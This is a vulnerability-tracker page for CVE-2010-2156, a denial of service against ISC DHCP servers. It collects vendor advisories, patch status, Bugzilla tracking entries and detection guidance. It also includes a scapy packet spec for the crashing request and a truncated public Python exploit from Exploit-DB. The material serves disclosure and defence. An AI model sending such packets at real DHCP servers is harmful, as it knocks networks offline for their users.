CVE-2010-2156
published 2010-06-07CVE-2010-2156: ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
PriorityP344medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
76.41%
99.5th percentile
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | isc-dhcp | < isc-dhcp 4.1.1-P1-1 (bookworm) | isc-dhcp 4.1.1-P1-1 (bookworm) |
| isc | dhcp | — | — |
| isc | dhcp | — | — |
| isc | dhcp | — | — |
| isc | dhcp | — | — |
| isc | dhcp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandDHCP Request with zero-length client_id option: DHCP(options=[("message-type","request"),("client_id",""),("end")])↗
- →Detect DHCP Request packets (UDP dst port 67) containing a zero-length client_id option (option 61 with length 0); such packets will crash ISC DHCP 4.0.x/4.1.x servers. ↗
- →Monitor ISC DHCP server process for abnormal/unexpected exits, which may indicate exploitation of this DoS vulnerability via a crafted zero-length client ID. ↗
- →Flag DHCP broadcast traffic sourced from MAC aa:aa:aa:aa:aa:aa as a known exploit indicator from the public PoC. ↗
- ·Only ISC DHCP versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 are affected; versions shipped with Red Hat Enterprise Linux 3, 4, and 5 are NOT vulnerable. ↗
- ·The exploit requires the attacker to supply a valid IP address within the DHCP server's subnet range for the ciaddr field; brute-forcing the subnet may be needed to identify a correct value. ↗
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv5.0MEDIUM
vendor_debian5.0MEDIUM
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
dhcp: remote DoS via zero-length client ID
vendor_redhat·2010-06-01·CVSS 5.0
CVE-2010-2156 [MEDIUM] dhcp: remote DoS via zero-length client ID
dhcp: remote DoS via zero-length client ID
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
Statement: Not vulnerable. These issues did not affect the versions of dhcp as shipped with Red Hat Enterprise Linux 3, 4, or 5.
Package: dhcp (Red Hat Enterprise Linux 6) - Not affected
Debian
CVE-2010-2156: isc-dhcp - ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to ...
vendor_debian·2010·CVSS 5.0
CVE-2010-2156 [MEDIUM] CVE-2010-2156: isc-dhcp - ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to ...
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
Scope: local
bookworm: resolved (fixed in 4.1.1-P1-1)
bullseye: resolved (fixed in 4.1.1-P1-1)
sid: resolved (fixed in 4.1.1-P1-1)
trixie: resolved (fixed in 4.1.1-P1-1)
GHSA
GHSA-rrx5-gxgm-9hrg: ISC DHCP 4
ghsa_unreviewed·2022-05-17
CVE-2010-2156 [MEDIUM] GHSA-rrx5-gxgm-9hrg: ISC DHCP 4
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
OSV
CVE-2010-2156: ISC DHCP 4
osv·2010-06-07·CVSS 5.0
CVE-2010-2156 [MEDIUM] CVE-2010-2156: ISC DHCP 4
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote attackers to cause a denial of service (server exit) via a zero-length client ID.
No detection rules found.
Exploit-DB
ISC DHCPD - Denial of Service
exploitdb·2010-07-03
CVE-2010-2156 ISC DHCPD - Denial of Service
ISC DHCPD - Denial of Service
---
#!/usr/bin/env python
# Exploit title: isc-dhcpd DoS
# Date: 03/07/2010
# Author: sid
# Software Link: https://www.isc.org/software/dhcp
# Version: 4.0.x, 4.1.x, 4.2.x
# CVE: cve-2010-2156
# ps: is possible make a bruteforce on subnet ip address to find a correct value.
#
import sys
import string
if len(sys.argv) is 1:
print("Usage: " + sys.argv[0] + "-ip=")
print("Example: " + sys.argv[0] + " -ip=192.168.1.100")
sys.exit(0)
for i in range(len(sys.argv)):
if string.find(sys.argv[i],"-ip") is 0:
globals()['ip'] = sys.argv[i].split('=')[1]
from scapy.all import *
globals()['verbose'] = 2
def msg(string, level):
if globals()['verbose'] >= level:
print(string)
msg("attack...",2)
p=(Ether(src="aa:aa:aa:aa:aa:aa",dst="ff:ff:ff:ff:ff:ff")/IP(dst="255.25
Metasploit
ISC DHCP Zero Length ClientID Denial of Service Module
metasploit
ISC DHCP Zero Length ClientID Denial of Service Module
ISC DHCP Zero Length ClientID Denial of Service Module
This module performs a Denial of Service Attack against the ISC DHCP server, versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request message with a 0-length client_id option for an IP address on the appropriate range for the dhcp server. When ISC DHCP Server tries to hash this value it exits abnormally.
Bugzilla
CVE-2010-2156 dhcp: remote DoS via zero-length client ID [fedora-all]
bugzilla·2010-06-07·CVSS 5.0
CVE-2010-2156 [MEDIUM] CVE-2010-2156 dhcp: remote DoS via zero-length client ID [fedora-all]
CVE-2010-2156 dhcp: remote DoS via zero-length client ID [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
Forr more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=601403
Please note: this issue affects multiple sup
Bugzilla
CVE-2010-2156 dhcp: remote DoS via zero-length client ID
bugzilla·2010-06-07·CVSS 5.0
CVE-2010-2156 [MEDIUM] CVE-2010-2156 dhcp: remote DoS via zero-length client ID
CVE-2010-2156 dhcp: remote DoS via zero-length client ID
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-2156 to
the following vulnerability:
Name: CVE-2010-2156
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2156
Assigned: 20100603
Reference: CONFIRM: http://ftp.isc.org/isc/dhcp/dhcp-4.0.2-P1-RELNOTES
Reference: CONFIRM: http://ftp.isc.org/isc/dhcp/dhcp-4.1.1-P1-RELNOTES
ISC DHCP 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1 allows remote
attackers to cause a denial of service (server exit) via a zero-length
client ID.
Discussion:
Created attachment 421951
upstream patch to correct the issue
---
Created dhcp tracking bugs for this issue
Affects: fedora-all [bug 601405]
---
dhcp-4.1.1-22.P1.fc13 has been submitted as an update for Fedora 13.
http:/
http://ftp.isc.org/isc/dhcp/dhcp-4.0.2-P1-RELNOTEShttp://ftp.isc.org/isc/dhcp/dhcp-4.1.1-P1-RELNOTEShttp://lists.fedoraproject.org/pipermail/package-announce/2010-June/042843.htmlhttp://secunia.com/advisories/40116http://www.exploit-db.com/exploits/14185http://www.mandriva.com/security/advisories?name=MDVSA-2010:114http://www.securityfocus.com/bid/40775http://www.securitytracker.com/id?1024093https://exchange.xforce.ibmcloud.com/vulnerabilities/59222http://ftp.isc.org/isc/dhcp/dhcp-4.0.2-P1-RELNOTEShttp://ftp.isc.org/isc/dhcp/dhcp-4.1.1-P1-RELNOTEShttp://lists.fedoraproject.org/pipermail/package-announce/2010-June/042843.htmlhttp://secunia.com/advisories/40116http://www.exploit-db.com/exploits/14185http://www.mandriva.com/security/advisories?name=MDVSA-2010:114http://www.securityfocus.com/bid/40775http://www.securitytracker.com/id?1024093https://exchange.xforce.ibmcloud.com/vulnerabilities/59222
2010-06-07
Published